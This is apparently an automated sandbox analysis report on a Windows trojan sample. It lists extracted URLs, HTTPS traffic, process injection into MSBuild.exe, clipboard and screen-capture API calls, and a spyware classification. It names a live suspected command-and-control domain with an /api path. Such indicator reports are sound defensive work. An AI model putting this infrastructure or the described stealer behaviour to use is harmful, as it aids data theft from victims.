Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://slamcopynammeks.shop/
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://slamcopynammeks.shop/C
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://slamcopynammeks.shop/CT
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://slamcopynammeks.shop/api
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://slamcopynammeks.shop:443/api
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://system.data.sqlite.org/
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.security.us.panasonic.com
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sqlite.org/lang_corefunc.html

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042EF60 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042EF60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042EF60 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042EF60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00430616 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_00430616

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEBB6B0	0_2_6CEBB6B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF0AC29	0_2_6CF0AC29
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEB2D70	0_2_6CEB2D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE4EE0	0_2_6CEE4EE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED4970	0_2_6CED4970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED4AC0	0_2_6CED4AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF00B89	0_2_6CF00B89
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CE98B30	0_2_6CE98B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF0A54D	0_2_6CF0A54D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED4550	0_2_6CED4550
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CE96650	0_2_6CE96650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CE9A7E0	0_2_6CE9A7E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CE9C7B0	0_2_6CE9C7B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEAA0C0	0_2_6CEAA0C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE63B0	0_2_6CEE63B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEF2310	0_2_6CEF2310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEF1CA0	0_2_6CEF1CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED3C90	0_2_6CED3C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF05DD2	0_2_6CF05DD2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE5DD0	0_2_6CEE5DD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE5EB9	0_2_6CEE5EB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED3E50	0_2_6CED3E50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF0BFF1	0_2_6CF0BFF1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF09FFC	0_2_6CF09FFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE58D7	0_2_6CEE58D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE58D5	0_2_6CEE58D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE5830	0_2_6CEE5830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF0B964	0_2_6CF0B964
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF09AAB	0_2_6CF09AAB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED3460	0_2_6CED3460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE5050	0_2_6CEE5050
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CED3260	0_2_6CED3260
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEE5274	0_2_6CEE5274
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_02A88038	0_2_02A88038
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_02A88CD8	0_2_02A88CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_02A81308	0_2_02A81308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_02A81318	0_2_02A81318
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_02A81728	0_2_02A81728
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_02A81738	0_2_02A81738
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_06EE26F8	0_2_06EE26F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_06EE0EB3	0_2_06EE0EB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_06EE26DB	0_2_06EE26DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_06EE0930	0_2_06EE0930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042000C	2_2_0042000C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043C1B0	2_2_0043C1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004263C6	2_2_004263C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004047F0	2_2_004047F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004208D0	2_2_004208D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00434FF0	2_2_00434FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00406070	2_2_00406070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042826A	2_2_0042826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004032D0	2_2_004032D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043C470	2_2_0043C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004374A0	2_2_004374A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004224AC	2_2_004224AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00406630	2_2_00406630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00427766	2_2_00427766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00429773	2_2_00429773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043C770	2_2_0043C770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004017E0	2_2_004017E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004249F0	2_2_004249F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041BA8A	2_2_0041BA8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042EB28	2_2_0042EB28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00421BD3	2_2_00421BD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00407D20	2_2_00407D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040EF60	2_2_0040EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00420FE0	2_2_00420FE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00408720 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00408F10 appears 180 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: String function: 6CEF9B35 appears 141 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: String function: 6CEF90D8 appears 51 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: String function: 6CEFD520 appears 31 times

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: invalid certificate

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000059C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2013283838.0000000006D40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2013353714.0000000006E40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.0000000006968000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.0000000005839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemainweeksource_band7.exeL* vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Data.SQLite.Linq.dllF vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePcapDotNet.Packets.dll0 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Binary or memory string: OriginalFilenamemainweeksource_band7.exeL* vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpUnknownLayer.cs	Suspicious method names: .IcmpUnknownLayer.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpLayer.cs	Suspicious method names: .IcmpLayer.EqualPayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpLayer.cs	Suspicious method names: .IcmpLayer.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpRouterAdvertisementDatagram.cs	Suspicious method names: .IcmpRouterAdvertisementDatagram.GetPayloadLength
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, PayloadLayer.cs	Suspicious method names: .PayloadLayer.Equals
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, PayloadLayer.cs	Suspicious method names: .PayloadLayer.Write
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpAddressMaskRequestLayer.cs	Suspicious method names: .IcmpAddressMaskRequestLayer.EqualPayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpAddressMaskRequestLayer.cs	Suspicious method names: .IcmpAddressMaskRequestLayer.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryIp.cs	Suspicious method names: .GreSourceRouteEntryIp.EqualsPayloads
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryIp.cs	Suspicious method names: .GreSourceRouteEntryIp.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntry.cs	Suspicious method names: .GreSourceRouteEntry.EqualsPayloads
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntry.cs	Suspicious method names: .GreSourceRouteEntry.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTimestampLayer.cs	Suspicious method names: .IcmpTimestampLayer.EqualPayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTimestampLayer.cs	Suspicious method names: .IcmpTimestampLayer.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryUnknown.cs	Suspicious method names: .GreSourceRouteEntryUnknown.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryUnknown.cs	Suspicious method names: .GreSourceRouteEntryUnknown.EqualsPayloads
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, EthernetPayloadDatagrams.cs	Suspicious method names: .EthernetPayloadDatagrams.Get
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTraceRouteLayer.cs	Suspicious method names: .IcmpTraceRouteLayer.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTraceRouteLayer.cs	Suspicious method names: .IcmpTraceRouteLayer.EqualPayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryAs.cs	Suspicious method names: .GreSourceRouteEntryAs.EqualsPayloads
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryAs.cs	Suspicious method names: .GreSourceRouteEntryAs.WritePayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpIpV4HeaderPlus64BitsPayloadDatagram.cs	Suspicious method names: .IcmpIpV4HeaderPlus64BitsPayloadDatagram.CalculateIsValid
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpIpV4PayloadDatagram.cs	Suspicious method names: .IcmpIpV4PayloadDatagram.CalculateIsValid
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpRouterAdvertisementLayer.cs	Suspicious method names: .IcmpRouterAdvertisementLayer.EqualPayload
Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpRouterAdvertisementLayer.cs	Suspicious method names: .IcmpRouterAdvertisementLayer.WritePayload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042D4DE CoCreateInstance,

2_2_0042D4DE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Mutant created: NULL
